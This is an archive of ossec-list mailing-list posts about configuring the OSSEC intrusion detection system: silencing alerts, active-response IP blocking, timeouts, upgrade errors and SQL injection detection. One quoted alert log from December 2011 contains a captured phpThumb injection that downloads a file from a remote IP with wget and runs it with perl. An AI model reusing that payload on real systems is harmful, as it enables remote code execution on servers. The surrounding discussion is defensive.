Re: [ossec-list] I'd like to ignore these...

2014-08-25 Thread Steven Stern 

Thanks very much!

On 08/23/2014 06:29 AM, Binet, Valere (NIH/NIA/IRP) [C] wrote:
> write a local rule in /var/ossec/rules/local_rules.xml
> 
> Your rule should look more or less like this
>   
> 1002
> AH01797
>Ignore AH01797 messages
>   
> 
> replace 11 with the next available ID if 11 is already used by 
> another rule.
> 
> Hoping this helps.
> 
> Valere
> ________
> From: Steven Stern [subscribed-li...@sterndata.com]
> Sent: Friday, August 22, 2014 6:21 PM
> To: ossec-list@googlegroups.com
> Subject: [ossec-list] I'd like to ignore these...
> 
> What's the best way to get OSSEC to ignore this particular "error" in
> error_log? It's the result of .htaccess rules operating corrrectly, so I
> don't really need to get emails about it.
> 
> I suspect that I need to tell it to non notifiy me on a rule 1002 if
> "AH01797" is in the text, but I'm not sure how to do that.
> 
> OSSEC HIDS Notification.
> 2014 Aug 22 17:14:00
> 
> Received From:
> cumberland->/var/log/httpd/mywordpress.sterndata.com-error_log
> Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
> Portion of the log(s):
> 
> [Fri Aug 22 17:14:00.115147 2014] [access_compat:error] [pid 16549]
> [client 93.120.14.206:55202] AH01797: client denied by server
> configuration: /var/www/mywordpress/wordpress/xmlrpc.php
> 
> --
> -- Steve
> 
> --
> 
> ---
> You received this message because you are subscribed to the Google Groups 
> "ossec-list" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to ossec-list+unsubscr...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.
> 


-- 
-- Steve

-- 

--- 
You received this message because you are subscribed to the Google Groups 
"ossec-list" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to ossec-list+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

[ossec-list] I'd like to ignore these...

2014-08-23 Thread Steven Stern 
What's the best way to get OSSEC to ignore this particular "error" in
error_log? It's the result of .htaccess rules operating corrrectly, so I
don't really need to get emails about it.

I suspect that I need to tell it to non notifiy me on a rule 1002 if
"AH01797" is in the text, but I'm not sure how to do that.

OSSEC HIDS Notification.
2014 Aug 22 17:14:00

Received From:
cumberland->/var/log/httpd/mywordpress.sterndata.com-error_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

[Fri Aug 22 17:14:00.115147 2014] [access_compat:error] [pid 16549]
[client 93.120.14.206:55202] AH01797: client denied by server
configuration: /var/www/mywordpress/wordpress/xmlrpc.php

-- 
-- Steve

-- 

--- 
You received this message because you are subscribed to the Google Groups 
"ossec-list" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to ossec-list+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

Re: [ossec-list] Integrity checksum changed for: '/usr/bin/from'

2014-06-04 Thread Steven Stern 
Check your package updater's logs.

On 06/04/2014 07:51 AM, dan (ddp) wrote:
> On Wed, Jun 4, 2014 at 4:53 AM, PAL 18  wrote:
>> I just got this a few minutes ago and i wasn't logged into the box. Should i
>> be worried?  Has my server been hacked?
>>
> 
> You have to investigate the change. There's no way for us to know.
> 
>> Rule: 550 fired (level 7) -> "Integrity checksum changed."
>> Portion of the log(s):
>>
>> Integrity checksum changed for: '/usr/bin/from'
>> Old md5sum was: '24dc25d90a3eca83ee42f2532f33e174'
>> New md5sum is : 'efbb9617688bb07ba38119d74d1b27da'
>> Old sha1sum was: '2908c6d4b2e09eeea85f549cfab4c7e68d7aed1c'
>> New sha1sum is : 'bad868d8da99eb14296553899feb44c35c8af47a'
>>


-- 
-- Steve

-- 

--- 
You received this message because you are subscribed to the Google Groups 
"ossec-list" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to ossec-list+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

[ossec-list] 1 zombie process after starting 2.8

2014-06-04 Thread Steven Stern 
# ps -ef |grep ossec
ossecm   17982 1  0 11:55 ?00:00:00 /var/ossec/bin/ossec-maild
root 17984 1  0 11:55 ?00:00:00 /var/ossec/bin/ossec-execd
ossec17990 1  0 11:55 ?00:00:00
/var/ossec/bin/ossec-analysisd
root 17994 1  0 11:55 ?00:00:00
/var/ossec/bin/ossec-logcollector
root 17998 1  0 11:55 ?00:00:00
/var/ossec/bin/ossec-syscheckd
ossec18001 1  0 11:55 ?00:00:00
/var/ossec/bin/ossec-monitord
ossecm   18012 17982  0 11:55 ?00:00:00 [ossec-maild] 


-- 
-- Steve

-- 

--- 
You received this message because you are subscribed to the Google Groups 
"ossec-list" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to ossec-list+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

[ossec-list] Won't start after upgrade from 2.7.1 to 2.8

2014-06-04 Thread Steven Stern 
At the end of ./install.sh

OSSEC HIDS v2.7.1 Stopped
Starting OSSEC HIDS v2.8 (by Trend Micro Inc.)...
ossec-analysisd: Configuration error. Exiting.

 - Configuration finished properly.

service ossec start
Starting OSSEC:[FAILED]

from ossec.log

2014/06/04 11:48:27 ossec-execd(1314): INFO: Shutdown received. Deleting
responses.
2014/06/04 11:48:27 ossec-execd(1225): INFO: SIGNAL Received. Exit
Cleaning...
2014/06/04 11:48:28 ossec-testrule: INFO: Reading local decoder file.
2014/06/04 11:48:28 ossec-analysisd: Invalid decoder name: 'bro-ids'.
2014/06/04 11:48:28 ossec-testrule(1220): ERROR: Error loading the
rules: 'bro-ids_rules.xml'.
2014/06/04 11:49:32 ossec-testrule: INFO: Reading local decoder file.
2014/06/04 11:49:32 ossec-analysisd: Invalid decoder name: 'bro-ids'.
2014/06/04 11:49:32 ossec-testrule(1220): ERROR: Error loading the
rules: 'bro-ids_rules.xml'.

Contents of ossec-init.conf:

DIRECTORY="/var/ossec"
VERSION="v2.8"
DATE="Wed Jun  4 11:48:28 CDT 2014"
TYPE="local"

Per another email message, deleting the line in
/var/ossec/etc/ossec.conf that includes the bro-ids.xml file fixed things.


-- 
-- Steve

-- 

--- 
You received this message because you are subscribed to the Google Groups 
"ossec-list" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to ossec-list+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

[ossec-list] Reporting network changes

2014-05-15 Thread Steven Stern 
I'm getting network change notifications a couple of times per day on
one system. It appears it's comparing the current state to some base
state where most of the services weren't started. I can't find anything
in the logs to indicate that services are being restarted during the
day, so this is a mystery to me.

I tried restarting OSSEC after everything is rolling along, thinking
that might reset the "base state" used for comparison but that doesn't
seem to help.

Received From: mooch->netstat -tan |grep LISTEN |grep -v 127.0.0.1 | sort
Rule: 533 fired (level 7) -> "Listened ports status (netstat) changed
(new port opened or closed)."
Portion of the log(s):

ossec: output: 'netstat -tan |grep LISTEN |grep -v 127.0.0.1 | sort':
tcp0  0 0.0.0.0:111 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:139 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:17500   0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:22  0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:25  0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:33060.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:445 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:53991   0.0.0.0:*
LISTEN
tcp0  0 ::1:631 :::*
LISTEN
tcp0  0 :::111  :::*
LISTEN
tcp0  0 :::139  :::*
LISTEN
tcp0  0 :::22   :::*
LISTEN
tcp0  0 :::443  :::*
LISTEN
tcp0  0 :::445
Previous output:
ossec: output: 'netstat -tan |grep LISTEN |grep -v 127.0.0.1 | sort':
tcp0  0 0.0.0.0:111 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:139 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:17500   0.0.0.0:*
LISTEN

-- 
-- Steve

-- 

--- 
You received this message because you are subscribed to the Google Groups 
"ossec-list" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to ossec-list+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

[ossec-list] keepalive message

2012-04-08 Thread Steven Stern 
This just arrived as an alert:

OSSEC HIDS Notification.
2012 Apr 08 10:40:50

Received From: breadboard->ossec-keepalive
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

--MARK--:
OVb32WA]wUjCqjo.b.X0iIeAuuD^c[)RQ_omKOioQ5Q6w4mxk9=6Z]OB4*k6#.r!z)-9CMFAm-bIcn60Ef^LPx#nj=)DCfh2;L)8;tdeXS[h5iqRo?,3w8&)h3q;q@UXr+zji&1nCV9P4'aA;K.21vQ8Go0X[2ola]8WuD!W;]ge_UEu?^E0S_&'R'/Ld0edd#0xXEC.z-c1K_DJm7RmeCTVvROyZaC3u,I*%!%V0y4T1b,v8,Huy]^b[@$c@Xn?bVy^Ah(I)Q],RGr8Ch,iQuX;?E[t,hsLlR9'gVBHU@Efldv]Y6RW[i.H[=0EN)&g(T?GiA$2TZqml'h9Zg%To@]jkVNf-xl8yki+'E?M.pZiXoAqvWs=B1aL4,RV72@avC+o6_ilSp8XEQ$hg?/HiNA$JzCYKVY5=]BfyJ5yhH+L=2aLk/A6'0NCIx]()b?sLA#9rLby(ErrOrkY4K$XSuI[S*#)(@f@T*O@!.ReB99&I)-gx3m&GU!;)?tns#'#YHR&)Q+2tYM2M*qr,CbCEu8r7JF'qy5wn4gap]3IUXSO-95)Tp3;=_jYx,RNu5r-Dy-atb=vhJr.0=yoUKUL#3Rd0Q?Cp4sT,Xb4g;Hn&ZZK



 --END OF NOTIFICATION


According to
http://groups.google.com/group/ossec-list/browse_thread/thread/744de4966f3824c5?pli=1,
this was a bug that's been fixed.  Is it anything to worry about?  I'm
using OSSEC 2.6 on CentOS 5
-- 
-- Steve

Re: [ossec-list] Re: Repeated-offenders still not working

2012-03-12 Thread Steven Stern 
On 03/12/2012 11:53 AM, Dimitri Yioulos wrote:
> On Monday 12 March 2012 12:24:47 pm Steven Stern wrote:
>> On 03/12/2012 10:49 AM, Dimitri Yioulos wrote:
>>> Anyone have any ideas on this?
>>>
>>>> All,
>>>>
>>>> Back at the end of last year, I asked about using the repeated-offenders
>>>> feature
>>>> in OH.  I added the following directives to ossec.conf on the host that
>>>> I want this to work in:
>>>>
>>>>   
>>>> host-deny
>>>> host-deny.sh
>>>> srcip
>>>> yes
>>>>   
>>>>
>>>>   
>>>> 
>>>> host-deny
>>>> local
>>>> 6
>>>> 600
>>>>   
>>>>
>>>> Despite that, it's not working.  Ossec reports the following:
>>>>
>>>> OSSEC HIDS Notification.
>>>> 2012 Mar 07 09:08:16
>>>>
>>>> Received From: (plymouth) 192.168.1.2->/var/log/messages
>>>> Rule: 40111 fired (level 10) -> "Multiple authentication failures."
>>>> Portion of the log(s):
>>>>
>>>> Mar  7 09:07:44 plymouth ipop3d[29926]: Login failed user=hod auth=hod
>>>> host=201-93-132-240.dsl.telesp.net.br [201.93.132.240]
>>>> ...
>>>>
>>>> However, rather than OH invoking repeated-offenders, and blocking the
>>>> offender for 600 seconds, I continue to see the offender make attempts
>>>> on the host.
>>>>
>>>> What am I missing here?
>>
>> Can you get onto the server when the block should be in effect?
>>
>> If so, what do you see in /etc/hosts.deny and from "iptables -L"?
>>
>> At the time the blocks should be taking place, do you see anything in
>> /var/log/messages or /var/ossec/logs/active-responses.log?
>>
>> Are you running SELinux in enforcing mode?
>>
>>
>> --
>> -- Steve
> 
> 
> Steve,
> 
> Thanks for your response.  By grepping for the offending IP addy 
> in /var/ossec/logs/active-responses.log, I saw that "host-deny.sh add" 
> and "firewall-drop.sh  add" were fired.  Ten minutes later, host-deny.sh 
> delete" and "firewall-drop.sh  delete" were fired.  So, it appears that 
> repeated-offenders is working.  I just didn't know where to look.  I guess 
> I'd 
> like an email notification when the blocks/unblocks are fired.  How/where do 
> I 
> enable that?

I think this is what you want.  By the way, if you're playing with rules
that lock people out, be sure to whitelist your own IP first.

http://itscblog.tamu.edu/ossec-email-alerts-on-active-responses/

http://www.ossec.net/wiki/Know_How:White_list


-- 
-- Steve

Re: [ossec-list] Re: Repeated-offenders still not working

2012-03-12 Thread Steven Stern 
On 03/12/2012 10:49 AM, Dimitri Yioulos wrote:
> Anyone have any ideas on this?
> 
> 
>> All,
>>
>> Back at the end of last year, I asked about using the repeated-offenders 
>> feature  
>> in OH.  I added the following directives to ossec.conf on the host that I 
>> want 
>> this to work in:
>>
>>   
>> host-deny
>> host-deny.sh
>> srcip
>> yes
>>   
>>
>>   
>> 
>> host-deny
>> local
>> 6
>> 600
>>   
>>
>> Despite that, it's not working.  Ossec reports the following:
>>
>> OSSEC HIDS Notification.
>> 2012 Mar 07 09:08:16
>>
>> Received From: (plymouth) 192.168.1.2->/var/log/messages
>> Rule: 40111 fired (level 10) -> "Multiple authentication failures."
>> Portion of the log(s):
>>
>> Mar  7 09:07:44 plymouth ipop3d[29926]: Login failed user=hod auth=hod 
>> host=201-93-132-240.dsl.telesp.net.br [201.93.132.240]
>> ...
>>
>> However, rather than OH invoking repeated-offenders, and blocking the 
>> offender 
>> for 600 seconds, I continue to see the offender make attempts on the host.
>>
>> What am I missing here?


Can you get onto the server when the block should be in effect?

If so, what do you see in /etc/hosts.deny and from "iptables -L"?

At the time the blocks should be taking place, do you see anything in
/var/log/messages or /var/ossec/logs/active-responses.log?

Are you running SELinux in enforcing mode?


-- 
-- Steve

Re: [ossec-list] ossec newbie, increasing tresshold for failed http login and unblock blocked ip

2012-02-05 Thread Steven Stern 
On 02/05/2012 11:56 AM, lucas kauffman wrote:
> 
> Also if an IP is blocked, how can I unblock it through ossec ? Or do I
> have to do it manually and delete the entries for hosts.deny and iptables ? 

OSSEC will unblock automatically, based on the timeout parameter in
ossec.conf or you your local rules.


  

host-deny
local
6
600
  

  

firewall-drop
local
6
600
  




-- 
-- Steve

Re: [ossec-list] Web Server Trouble

2012-01-25 Thread Steven Stern 
I get a lot of 404 alerts, and I let OSSEC block access when it's
multiples from the same IP. Typically, they're looking for phpmyadmin or
other common (and probably poorly secured tools) in a number of locations.

On 01/24/2012 11:33 PM, Damien Hull wrote:
> It looks like someone was requesting thee favicon and the server
> replied with "404"... How does that equal a level 10 alert? Anyway,
> here's the log info.
> 
> GET /theme/image.php?theme=moodlebook&image=favicon&rev=282&component=theme
> HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT
> 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET
> CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; IPH
> 1.1.21.4019)"
> 
> On Tue, Jan 24, 2012 at 10:32 AM, Jason 'XenoPhage' Frisvold
>  wrote:
>> On Jan 24, 2012, at 8:37 AM, Joe Gedeon wrote:
>>> You should look at your logs and see what is triggering the 400's and
>>> fix that issue if it is a server side issue.
>>
>> Agreed.  Basically, the web browser is trying to obtain something from the 
>> server that's just not there.  Thus, 400 errors are triggered.  As a result, 
>> OSSEC sees a bunch of these fly by and considers it an attack.  It's far 
>> better to fix the underlying problem than to alter OSSEC to ignore such 
>> things.
>>


-- 
-- Steve

Re: [ossec-list] perhaps a dump question but need to ask...

2011-12-27 Thread Steven Stern 
Be sure to whitelist your own IP address!

On 12/27/2011 09:57 AM, Peter Skurczak wrote:
> Hello there, 
> 
> I was having similar problem. I wanted to find the way how to block an
> ip permanently. 
> I ended up with increasing the "ban time" for not 600 but 60
> seconds and I think that is enough right?
> 
> I also think that if you changed this option
> yes
> to "no" then the ip address will be banned forever, but haven't tried
> this option yet.
> 
> Peter
> 
> 
> On Tue, Dec 27, 2011 at 3:02 PM, jeff  > wrote:
> 
> From time to time I get these bozo's trying to hack the site.
> 
> If there any way to take any level 9's and level 10's offenders IP
> addresses and add their IP addresses to a blocked list automatically.
> 
> Thanks in advance.
> 
> 
> OSSEC HIDS Notification.
> 
> 2011 Dec 26 10:40:46
> 
> Received From: (mysite-on-12)
> 65.36.247.12->/usr/local/apache1.3/logs/
> surveyreports_access_12262011.log
> 
> Rule: 31153 fired (level 10) -> "Multiple common web attacks from same
> souce
> ip."
> 
> Portion of the log(s):
> 
> 94.23.24.185 - - [26/Dec/2011:12:09:27 -0500] "GET
> /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?
> src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line
> %20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f
> %2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;
> %20&phpThumbDebug=9
> HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0)
> Gecko/20100101 Firefox/8.0"
> 
> 



-- 
-- Steve

[ossec-list] Trojan false positive and portreserve

2011-12-27 Thread Steven Stern 
I just disabled cups on my server (no printer, no need to print) and
OSSEC reported

Port '631'(tcp) hidden. Kernel-level rootkit or trojaned version of netstat

A quick check of netstat shows

$ sudo netstat -anp |grep 631
udp0  0 0.0.0.0:631 0.0.0.0:*
1125/portreserve

And Googling tells me that portreserve is there to make sure that if I
were to start cups later, the necessary port would be available.

Should OSSEC be modified to be aware of ports held by portreserve?

System is CentOS 6.2.

-- 
-- Steve

Re: [ossec-list] disable-account

2011-09-19 Thread Steven Stern 
Disabling root seems like a nice path to a DoS.  You'd probably do
better to use a rule to block the offending IP rather than killing
root's account.  (Hint from hard personal experience: Exclude your own
IP from the rule.)


On 09/19/2011 10:56 AM, dan (ddp) wrote:
> 
> On Sep 19, 2011 11:53 AM, "Damien Hull"  > wrote:
>>
>> Here's my configuration for disable-account. It doesn't work. I'm not
> sure I understand how it works. I was hoping a user would get kicked off
> the system after too many failed login attempts. I tried to "su" to root
> and type in the wrong password. I get an email from OSSEC but that's it.
> The user is not kicked off the system. 
>>
>>  
>>disable-account
>>local
>>600
>>  
>>
> 
> It doesn't look like you list when the AR should fire. Certain sid?
> Certain level?
> Also, I'm not sure the user will be kicked off. The account will be
> disabled, but beyond that I'm not sure (I don't use that script).
> 
>> On Sep 18, 2011, at 5:42 PM, "dan (ddp)"  > wrote:
>>
>>> Why now share your configuration so we can try to help?
>>>
>>> On Sep 18, 2011 9:40 PM, "Damien Hull"  > wrote:
>>> > I just reinstalled OSSEC and configured "disable-account". No luck. It
>>> > doesn't work.
>>> >
>>> > Are there any instructions for this?
>>> >
>>> > Sent from my iPhone
>>> >
>>> > On Sep 18, 2011, at 2:09 PM, Eero Volotinen  > wrote:
>>> >
>>> >> 2011/9/19 Damien Hull mailto:dh...@section9.us>>:
>>> >>> I just installed OSSEC version 2.6 on ubuntu 10.04. I tried to
>>> >>> configure OSSEC to disable a user account with no luck.
>>> >>>
>>> >>> I tested it by typing the wrong password into "su". I get an
> email but
>>> >>> the account is still active.
>>> >>>
>>> >>> How do I disable user accounts with OSSEC?
>>> >>>
>>> >>
>>> >> is active response enabled?
>>> >>
>>> >> --
>>> >> Eero
> 


-- 
-- Steve

Re: [ossec-list] stupid question on ossec configuration

2011-09-07 Thread Steven Stern 
On 09/07/2011 09:10 AM, Eero Volotinen wrote:
> Hi List,
> 
> I want alert to ossec when linux interface (ethernet) link goes down ?
> How to do this?
> 
> --
> Eero

Dumb question in return: If the network is down, how is it going to
notify you?

You probably want one or more external boxes monitoring connectivity and
let them send messages.  Nagios?

-- 
-- Steve

Re: [ossec-list] OSSEC-Keepalive message -- what does this mean?

2011-06-17 Thread Steven Stern 
I'm using 2.5.1. There is no separate manager; OSSEC runs on and reports 
from this system.


On 06/17/2011 03:04 PM, dan (ddp) wrote:

Hi Steven,
Those are keepalive messages from an agent to the manager. You can ignore them.
What version of OSSEC do you have installed? They're supposed to be
ignored so they don't fire alerts...

On Fri, Jun 17, 2011 at 3:52 PM, Steven Stern
  wrote:

What does this mean?  Where do I look for an error?



Received From: ip-10-x->ossec-keepalive
Rule: 1002 fired (level 2) ->  "Unknown problem somewhere in the system."
Portion of the log(s):

--MARK--:
ggM6EJz3j+TNLDYHUgwX3-n_2esOyS6Eg0SLR(i1pjiiMpPOvufGY79ut]rR]FEc?-NRqd0GnqOhFMWioj.#y6OS1ndeS+ga#bRKfZy6^vv3pz@DJ8Xp-f7RttetiYtC0s$n*T)1%Wy.-RAzu=OYL4Ym=2F?uhC_zXPlk&#'HSExdne@SaE.4,XVYLdAS)p*KmKc.4JEq%18]5NN5*'(v/+BJ;2]tzv3LnoI(XucF+!%c6!q?3Qv1FeT#6,?Nr3')*^5-ep!HIS;i!WVHgyRLDerROr?oCGb1p6?7D9X@!.BOT=Ehp+aaHsSD=?R7FS&cs^!eT^^xul@$QXCnMC2Bco5'n4iar;c=8u]9d@axEtSC*_.@5ZV7v8j-Gr-Xk'.A1;d5lRK.!Lzd$xxME(o0cx/IO+OgwL_=*=e.-P[1I8mpNJ2*v&'xV;od$kYRdMI_(N*8Ku*(,/PJHl8lJ2-/USQ^2iA5cqc_lBfdV-D?C)-s/ZD-97_@uEcEM&S.aUz0+E3L9b;TC^@A-W4ZyT(a=_((4E^m;i#%];7m'Z5v-Ld#P8)v95v0bW[5[rAB%gj9/yDF=ciw]0cL&E6TRK

--
-- Steve

[ossec-list] OSSEC-Keepalive message -- what does this mean?

2011-06-17 Thread Steven Stern 

What does this mean?  Where do I look for an error?



Received From: ip-10-x->ossec-keepalive
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

--MARK--: 
ggM6EJz3j+TNLDYHUgwX3-n_2esOyS6Eg0SLR(i1pjiiMpPOvufGY79ut]rR]FEc?-NRqd0GnqOhFMWioj.#y6OS1ndeS+ga#bRKfZy6^vv3pz@DJ8Xp-f7RttetiYtC0s$n*T)1%Wy.-RAzu=OYL4Ym=2F?uhC_zXPlk&#'HSExdne@SaE.4,XVYLdAS)p*KmKc.4JEq%18]5NN5*'(v/+BJ;2]tzv3LnoI(XucF+!%c6!q?3Qv1FeT#6,?Nr3')*^5-ep!HIS;i!WVHgyRLDerROr?oCGb1p6?7D9X@!.BOT=Ehp+aaHsSD=?R7FS&cs^!eT^^xul@$QXCnMC2Bco5'n4iar;c=8u]9d@axEtSC*_.@5ZV7v8j-Gr-Xk'.A1;d5lRK.!Lzd$xxME(o0cx/IO+OgwL_=*=e.-P[1I8mpNJ2*v&'xV;od$kYRdMI_(N*8Ku*(,/PJHl8lJ2-/USQ^2iA5cqc_lBfdV-D?C)-s/ZD-97_@uEcEM&S.aUz0+E3L9b;TC^@A-W4ZyT(a=_((4E^m;i#%];7m'Z5v-Ld#P8)v95v0bW[5[rAB%gj9/yDF=ciw]0cL&E6TRK


--
-- Steve

Re: [ossec-list] stupid (?) rule question

2011-06-05 Thread Steven Stern 

On 06/05/2011 07:02 AM, Rainer wrote:

Hi,

I want to block a certain WWW bot called verticalpigeon; it is known
to scan for Joomla! installations. You can also trigger it through the
website manually. But the nice thing is, it says
who it is:

  66.103.61.161 - - [05/Jun/2011:09:44:59 +0200]
"GET /index2.php?option=com_docman HTTP/1.0" 404 1928
"http://verticalpigeon.com/"; "Mozilla/4.0 (compatible; MSIE 8.0; Windows
NT 5.1; http://verticalpigeon.com/)"

So I thought I could block that bot after the first time it accesses
a website by just adding a rule matching the string
"http://verticalpigeon.com/";

The rule I created is: (local_rules.xml)


 http://verticalpigeon.com
 alert_by_email
 joomla scanner
 attacks,


But it just doesn't work.
Apache access_log and error_log is decoded fine.
As far as I understood, I don't need to escape : and / in the rule
above. What did I miss?

thanks.




Even if your rule worked, you're giving this system one shot at your 
site.  It might be better to block it at the apache level.  This info is 
a bit dated, but I think it should still work with current versions of 
Apache:

http://www.evolt.org/article/Using_Apache_to_stop_bad_robots/18/15126/

--
-- Steve

Re: [ossec-list] Timeout value units

2011-03-28 Thread Steven Stern 
On 03/28/2011 01:47 PM, dan (ddp) wrote:
> The units are seconds.
> How far apart were the attacks?
> 
> On Sun, Mar 27, 2011 at 12:31 PM, Steven Stern
>  wrote:
>> I just want to confirm In an active response rule, is the timeout
>> value the number seconds?
>>
>> I had someone whacking my website today looking for mysql access and the
>> rule triggered three times (on the same IP address) in two minutes.  The
>> first trigger should have locked out his IP for "360" -- my assumption
>> is that is 6 minutes, long enough for the script to time out and move on
>> to someone else.
>>
>>
>> --
>> -- Steve
>>

They were all within two minutes. I've added some logging to the drop
script so I can see exactly when it gets triggered.  In my testing, I
managed to lock myself out of the server for 6 minutes, so I know it
works. 

-- 
-- Steve

[ossec-list] Timeout value units

2011-03-27 Thread Steven Stern 
I just want to confirm In an active response rule, is the timeout
value the number seconds?

I had someone whacking my website today looking for mysql access and the
rule triggered three times (on the same IP address) in two minutes.  The
first trigger should have locked out his IP for "360" -- my assumption
is that is 6 minutes, long enough for the script to time out and move on
to someone else.


-- 
-- Steve

Re: [ossec-list] OSSEC for Sql injection attack

2011-02-05 Thread Steven Stern 
On 02/04/2011 09:46 PM, tanishk lakhaani wrote:
> Yes, the active response works on the basis of this only...When u
> launch a scan, a few attacks will acually pass thru, then only the agent
> will forward the corresponding logs to the OSSEC Server, who will then
> decide whether to use Active Response or not. Once the server decides to
> use active response, all the future attacks from the attacker IP will be
> prevented from being executed.This is how active respone works.
>  
> Btw, Steve, can u pls tell me how is the link that u have just
> circulated (the XKCD reference) is helpful to us ?
>  
> Regards
> Tanishk
> 
> On Sat, Feb 5, 2011 at 2:18 AM, Steven Stern
> mailto:subscribed-li...@sterndata.com>>
> wrote:
> 
> On 02/04/2011 12:39 PM, tanishk lakhaani wrote:
> > Well, I think that deploying active response can be a good way out to
> > prevent SQL Injection based attacks. However, there may be a few
> issues
> > related to it viz..decoders in ossec are designed to indicate a SQL
> > Injection attack even in case SELEC/UNION or any other SQL Based
> command
> > is used in the Request. This may be a bit of hinderance, as it may be
> > that the legitimate traffic is being blocked.
> >
> > I have already deployed Active Response in testing Environment,
> and post
> > deplpyment , launched a NESSUS Scan, and to my surprise, Active
> Response
> > turned out to be fantastic to prevent SQL Injection based attacks.
> >
> > Regards
> > Tanishk
> >
> > On Fri, Feb 4, 2011 at 12:12 AM, Steven Stern
> >  <mailto:subscribed-li...@sterndata.com>
> <mailto:subscribed-li...@sterndata.com
> <mailto:subscribed-li...@sterndata.com>>>
> > wrote:
> >
> > On 02/03/2011 12:00 PM, satish patel wrote:
> > > How efficient OSSEC is to stop SQL injection ? If not then i
> have to
> > > move on mod_security
> > >
> > > Is anybody out there who using ossec for sql injection ?
> > >
> > >
> > > Thanks,
> > > S
> > It's very good at detecting SQL injection, but your code shouldn't
> > () be susceptible to it.  mod_security has its own
> issues with
> > false positives.
> >
> > --
> > -- Steve
> >
> >
> Unfortunately, the first attack line probably gets through.  By the way,
> mandatory XKCD reference: http://xkcd.com/327/
> 
> --
> -- Steve
> 
> 
> 
> 
> -- 
> warm regards
> Tanishk Lakhaani

Exactly. The first injection connection can be bad.  I have run systems
that were found to be vulnerable to SQL injection.  OSSEC detected the
attack, but we were being hit from multiple IPs over a long time at a
low rate. Active response wouldn't have helped.  We were able to use
OSSECs logs (and system logs) to figure out what scripts the attackers
were using. We took our systems off the internet, ran the same scans at
a high rate, and determined which parts of the system had not been
hardened against injection attacks. We then coded in a protection layer.
When we went back on the internet, OSSEC showed that the attacks
continued but without any success.

-- 
-- Steve

Re: [ossec-list] OSSEC for Sql injection attack

2011-02-04 Thread Steven Stern 
On 02/04/2011 12:39 PM, tanishk lakhaani wrote:
> Well, I think that deploying active response can be a good way out to
> prevent SQL Injection based attacks. However, there may be a few issues
> related to it viz..decoders in ossec are designed to indicate a SQL
> Injection attack even in case SELEC/UNION or any other SQL Based command
> is used in the Request. This may be a bit of hinderance, as it may be
> that the legitimate traffic is being blocked.
>  
> I have already deployed Active Response in testing Environment, and post
> deplpyment , launched a NESSUS Scan, and to my surprise, Active Response
> turned out to be fantastic to prevent SQL Injection based attacks.
>  
> Regards
> Tanishk
> 
> On Fri, Feb 4, 2011 at 12:12 AM, Steven Stern
> mailto:subscribed-li...@sterndata.com>>
> wrote:
> 
> On 02/03/2011 12:00 PM, satish patel wrote:
> > How efficient OSSEC is to stop SQL injection ? If not then i have to
> > move on mod_security
> >
> > Is anybody out there who using ossec for sql injection ?
> >
> >
> > Thanks,
> > S
> It's very good at detecting SQL injection, but your code shouldn't
> () be susceptible to it.  mod_security has its own issues with
> false positives.
> 
> --
> -- Steve
> 
> 
Unfortunately, the first attack line probably gets through.  By the way,
mandatory XKCD reference: http://xkcd.com/327/

-- 
-- Steve

Re: [ossec-list] OSSEC for Sql injection attack

2011-02-03 Thread Steven Stern 
On 02/03/2011 12:00 PM, satish patel wrote:
> How efficient OSSEC is to stop SQL injection ? If not then i have to
> move on mod_security
> 
> Is anybody out there who using ossec for sql injection ?
> 
> 
> Thanks,
> S
It's very good at detecting SQL injection, but your code shouldn't
() be susceptible to it.  mod_security has its own issues with
false positives.

-- 
-- Steve

Re: [ossec-list] Re: Active Response not activating [Solved]

2010-10-31 Thread Steven Stern 
On 10/27/2010 01:30 PM, Steven Stern wrote:
> Thanks.  I've changed it and will await the next attack.
> 
> On Wed, Oct 27, 2010 at 1:15 PM, jplee3  wrote:
>> Your  section looks OK. There may be issues with the > response> portion however. Try this:
>>
>> 
>>  no
>>  firewall-drop
>>  local
>>  31151
>>  8 (I don't think you even need this flag if you
>> *only* want to trigger on the rule id 31151)
>> 
>>
>>
>> Let us know if that works. I think it might be the "disabled" flag
>> that was keeping it back.
>>
>>
>> On Oct 27, 10:44 am, Steven Stern 
>> wrote:
>>> In /var/ossec/etc/osse.conf, I have
>>>
>>> 
>>>   firewall-drop
>>>   firewall-drop.sh
>>>   srcip
>>>   yes
>>> 
>>>
>>> 
>>>   firewall-drop
